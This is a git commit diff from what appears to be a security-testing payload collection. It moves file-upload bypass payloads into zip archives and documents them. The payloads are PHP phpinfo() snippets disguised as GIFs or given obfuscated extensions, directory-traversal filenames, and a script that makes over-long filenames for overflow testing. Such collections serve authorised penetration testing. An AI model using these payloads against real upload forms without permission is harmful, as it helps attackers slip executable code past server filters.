Merge pull request #790 from ItsIgnacioPortal/i770

Fixes #770: Zipped files with problematic filenames
2025-12-14 04:44:44 +01:00 · 2022-08-02 00:12:52 +01:00 · 2022-08-02 00:12:52 +01:00 · edc55381b0
commit edc55381b0
parent 51bad1c320 a37dbe1d3d
52 changed files with 71 additions and 66 deletions
--- a/Payloads/File-Names/README.md
+++ b/Payloads/File-Names/README.md
@ -0,0 +1,35 @@
+## directory-traversal.zip
+
+This zip file containes files with filenames for directory traversal:
+
+- `..::..::;`
+- `..::;`
+- `..:;`
+- `..;`
+- `..;:`
+- `..\:;`
+- `.:..:`
+- `.:..:;`
+- `.:;`
+- `.;`
+- `.;:`
+- `:..:;`
+- `::..::;`
+- `:;`
+- `;`
+- `;:`
+- `;\:`
+
+> It's impossible to unzip this file on Windows, due to their arbitrary filename restrictions. It's possible to unzip it in WSL though.
+
+
+## max-length.zip
+
+This zip file containes files with long filenames for testing buffer overflow vulnerabilities, or error-based access control vulnerabilities. This zip also includes a script to generate arbitrarily long filenames.
+
+
+- `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif`
+- `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`
+- `make-255.sh`
+
+> It's impossible to unzip this file on Windows, due to their arbitrary filename restrictions. It's possible to unzip it in WSL though.
--- a/Payloads/File-Names/directory-traversal.zip
+++ b/Payloads/File-Names/directory-traversal.zip
--- a/Payloads/File-Names/max-length.zip
+++ b/Payloads/File-Names/max-length.zip
--- a/Payloads/File-Names/max-length/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+++ b/Payloads/File-Names/max-length/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@ -1 +0,0 @@
-python -c 'print "A" *232'
--- a/Payloads/File-Names/max-length/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+++ b/Payloads/File-Names/max-length/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
@ -1,2 +0,0 @@
-GIF8;
-<?php phpinfo(); ?>
--- a/Payloads/File-Names/max-length/make-255.sh
+++ b/Payloads/File-Names/max-length/make-255.sh
@ -1,7 +0,0 @@
-#!/bin/sh
-#$ msf-pattern_create -l 255
-touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
-
-echo 'GIF8;' > Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
-
-echo '<?php phpinfo(); ?>' > Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.php
--- a/Payloads/File-Names/traversal/..::..::;
+++ b/Payloads/File-Names/traversal/..::..::;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/..::;
+++ b/Payloads/File-Names/traversal/..::;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/..:;
+++ b/Payloads/File-Names/traversal/..:;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/..;
+++ b/Payloads/File-Names/traversal/..;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/..;:
+++ b/Payloads/File-Names/traversal/..;:
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/..\:;
+++ b/Payloads/File-Names/traversal/..\:;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/.:..:
+++ b/Payloads/File-Names/traversal/.:..:
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/.:..:;
+++ b/Payloads/File-Names/traversal/.:..:;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/.:;
+++ b/Payloads/File-Names/traversal/.:;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/.;
+++ b/Payloads/File-Names/traversal/.;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/.;:
+++ b/Payloads/File-Names/traversal/.;:
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/:..:;
+++ b/Payloads/File-Names/traversal/:..:;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/::..::;
+++ b/Payloads/File-Names/traversal/::..::;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/:;
+++ b/Payloads/File-Names/traversal/:;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/;
+++ b/Payloads/File-Names/traversal/;
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/;:
+++ b/Payloads/File-Names/traversal/;:
@ -1 +0,0 @@
-Hello World
--- a/Payloads/File-Names/traversal/;\:
+++ b/Payloads/File-Names/traversal/;\:
@ -1 +0,0 @@
-Hello World
--- a/Payloads/PHPInfo.zip
+++ b/Payloads/PHPInfo.zip
--- a/Payloads/PHPInfo/make-aio.sh
+++ b/Payloads/PHPInfo/make-aio.sh
@ -1,5 +0,0 @@
-#!/bin/sh
-zip phpinfo-aio.zip phpinfo*.{p*,txt,jp*g,gif}
-
-tar -cvf phpinfo-aio.tar phpinfo*.{p*,txt,jp*g,gif}
-
--- a/Payloads/PHPInfo/phpinfo-aio.tar
+++ b/Payloads/PHPInfo/phpinfo-aio.tar
--- a/Payloads/PHPInfo/phpinfo-aio.zip
+++ b/Payloads/PHPInfo/phpinfo-aio.zip
--- a/Payloads/PHPInfo/phpinfo-metadata.gif
+++ b/Payloads/PHPInfo/phpinfo-metadata.gif
--- a/Payloads/PHPInfo/phpinfo-metadata.jpg
+++ b/Payloads/PHPInfo/phpinfo-metadata.jpg
--- a/Payloads/PHPInfo/phpinfo-shortsyntax.php
+++ b/Payloads/PHPInfo/phpinfo-shortsyntax.php
@ -1,3 +0,0 @@
-//tested on 7.2
-// even with short_open_tag=0
-<?=phpinfo()?>
--- a/Payloads/PHPInfo/phpinfo.""gif
+++ b/Payloads/PHPInfo/phpinfo.""gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo."gif
+++ b/Payloads/PHPInfo/phpinfo."gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.''gif
+++ b/Payloads/PHPInfo/phpinfo.''gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.'gif
+++ b/Payloads/PHPInfo/phpinfo.'gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.jpg.php
+++ b/Payloads/PHPInfo/phpinfo.jpg.php
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php
+++ b/Payloads/PHPInfo/phpinfo.php
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php-1.gif
+++ b/Payloads/PHPInfo/phpinfo.php-1.gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php-2.gif
+++ b/Payloads/PHPInfo/phpinfo.php-2.gif
@ -1 +0,0 @@
-GIF89a1
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php.""gif
+++ b/Payloads/PHPInfo/phpinfo.php.""gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php."gif
+++ b/Payloads/PHPInfo/phpinfo.php."gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php.''gif
+++ b/Payloads/PHPInfo/phpinfo.php.''gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php.'gif
+++ b/Payloads/PHPInfo/phpinfo.php.'gif
@ -1,2 +0,0 @@
-GIF89a1
-
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php3
+++ b/Payloads/PHPInfo/phpinfo.php3
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php4
+++ b/Payloads/PHPInfo/phpinfo.php4
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php5
+++ b/Payloads/PHPInfo/phpinfo.php5
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php7
+++ b/Payloads/PHPInfo/phpinfo.php7
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php;.txt
+++ b/Payloads/PHPInfo/phpinfo.php;.txt
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.phpt
+++ b/Payloads/PHPInfo/phpinfo.phpt
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.pht
+++ b/Payloads/PHPInfo/phpinfo.pht
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.phtml
+++ b/Payloads/PHPInfo/phpinfo.phtml
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.txt
+++ b/Payloads/PHPInfo/phpinfo.txt
@ -1 +0,0 @@
-<?php phpinfo(); ?>
--- a/Payloads/README.md
+++ b/Payloads/README.md
@ -44,4 +44,39 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali

 ## POC_img_phpinfo File

-Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
+Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
+
+
+## PHPInfo.zip
+
+This zip file containes files with filenames for bypassing blacklists and accessing `phpinfo.php`:
+
+- ` make-aio.sh`
+- ` phpinfo-aio.tar`
+- ` phpinfo-aio.zip`
+- `'phpinfo.""gif'`
+- `'phpinfo."gif'`
+- `"phpinfo.''gif"`
+- `"phpinfo.'gif"`
+- ` phpinfo.jpg.php`
+- ` phpinfo-metadata.gif`
+- ` phpinfo-metadata.jpg`
+- ` phpinfo.php`
+- ` phpinfo.php-1.gif`
+- ` phpinfo.php-2.gif`
+- ` phpinfo.php3`
+- ` phpinfo.php4`
+- ` phpinfo.php5`
+- ` phpinfo.php7`
+- `'phpinfo.php.""gif'`
+- `'phpinfo.php."gif'`
+- `"phpinfo.php.''gif"`
+- `"phpinfo.php.'gif"`
+- ` phpinfo.phpt`
+- `'phpinfo.php;.txt'`
+- ` phpinfo.pht`
+- ` phpinfo.phtml`
+- ` phpinfo-shortsyntax.php`
+- ` phpinfo.txt`
+
+It's impossible to unzip this file on Windows, due to their arbitrary filename restrictions. It's possible to unzip it in WSL though.